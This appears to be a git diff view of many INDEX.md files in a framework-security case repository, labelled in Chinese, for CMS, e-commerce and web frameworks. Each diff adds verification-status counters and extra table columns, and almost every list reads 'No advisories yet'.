| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/joomla/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/mediawiki/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/moodle/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/strapi/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/cms/wordpress/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -29,6 +33,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/adobe-commerce/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/magento-open-source/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/medusa/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/opencart/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/openmage/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/prestashop/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,6 +30,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/saleor/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/shopware/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/woocommerce/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -27,6 +31,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/angular/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/aspnet-core/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -24,6 +28,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/astro/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/django/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/echo/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -24,6 +28,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/esbuild/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/express/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/fastify/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/flask/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/gin/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -24,6 +28,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/hapi/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/koa/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/laravel/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/nestjs/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

62
07-framework-security/frameworks/nextjs/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `26` - 总案例数: `26`
- 近 30 天新增/更新: `5` - 近 30 天新增/更新: `5`
- 重点 Markdown 案例数: `26` - 重点 Markdown 案例数: `26`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `26`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,31 +30,31 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
